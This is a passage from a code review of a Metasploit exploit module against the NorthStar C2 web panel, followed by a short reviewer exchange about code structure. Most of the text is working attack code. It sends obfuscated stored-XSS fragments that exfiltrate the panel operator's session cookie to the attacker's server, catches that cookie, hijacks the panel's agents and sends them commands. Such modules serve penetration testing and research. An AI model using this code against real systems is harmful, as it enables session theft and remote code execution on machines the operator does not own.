modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb

```diff
@@ -0,0 +1,237 @@
+      'vars_post' => {
+        'slave' => agent_id,
+        'command' => command,
+        'sid' => agent_id,
+        'token' => csrf_token
+      }
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+
+    # 1min seems enough, NorthStar mentions 4_000ms response times...
+    (2 * 60).times do
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'getresponse.php'),
+        'headers' => {
+          'cookie' => "PHPSESSID=#{cookie}"
+        },
+        'vars_get' => {
+          'slave' => agent_id
+        }
+      )
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+      if !res.body.empty? || command == 'die'
+        vprint_good("    Command sent successfully to agent #{agent_id}, response: #{res.body}")
+        return
+      end
+      Rex.sleep(0.5)
+    end
+  end
+
+  def on_request_uri(cli, request)
+    if request.method == 'GET' && @xss_response_received == false
+      vprint_status('Received GET request.')
+      return unless request.uri.include? '='
+
+      cookie = request.uri.split('PHPSESSID=')[1]
+      print_good("Received cookie: #{cookie}")
+      send_response_html(cli, '')
+      @xss_response_received = true
+      steal_agents(cookie)
+    end
+    send_response_html(cli, '')
+  end
+
+  def xor_strings(text, key)
+    text.chars.map.with_index { |char, i| (char.ord ^ key[i % key.length].ord).chr }.join
+  end
+
+  def srvhost
+    datastore['SRVHOST']
+  end
+
+  def exploit
+    fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if srvhost == '0.0.0.0'
+    fail_with(Failure::BadConfig, 'SRVPORT and FETCH_SRVPORT must be different') if datastore['SRVPORT'] == datastore['FETCH_SRVPORT']
+    @xss_response_received = false
+    vprint_status('Sending XSS')
+    # divide up the host length so that it fits in our payload
+    h1 = srvhost[0...srvhost.length / 2]
+    h2 = srvhost[srvhost.length / 2..]
+    sid_payloads = ['N*/</script><q', 'N*/i.src=u/*q', 'N*/new Image;/*q', 'N*/var i=/*q', "N*/s+h+p+'/'+c;/*q", 'N*/var u=/*q', "N*/'http://';/*q", 'N*/var s=/*q', "N*/':#{datastore['SRVPORT']}';/*q", 'N*/var p=/*q', 'N*/a+b;/*q', 'N*/var h=/*q', "N*/'#{h2}';/*q", 'N*/var b=/*q', "N*/'#{h1}';/*q", 'N*/var a=/*q', 'N*/d.cookie;/*q', 'N*/var c=/*q', 'N*/document;/*q', 'N*/var d=/*q', 'N</td><script>/*q']
+    sid_payloads.each do |pload|
+      vprint_status("Sending: #{pload}")
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'login.php'),
+        'method' => 'POST',
+        'vars_get' => {
+          'sid' => Rex::Text.encode_base64(xor_strings(pload, 'northstar'))
+        }
+      )
+
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    end
+    print_status('Waiting on XSS execution')
+    super
```

Comment:
A lot of the code here could probably be moved to a `primer` method. Better explained by @bwatters-r7 👍 Thanks!

Reply:
Yup; please see https://docs.metasploit.com/docs/development/developing-modules/libraries/http/how-to-write-a-module-using-httpserver-and-httpclient.html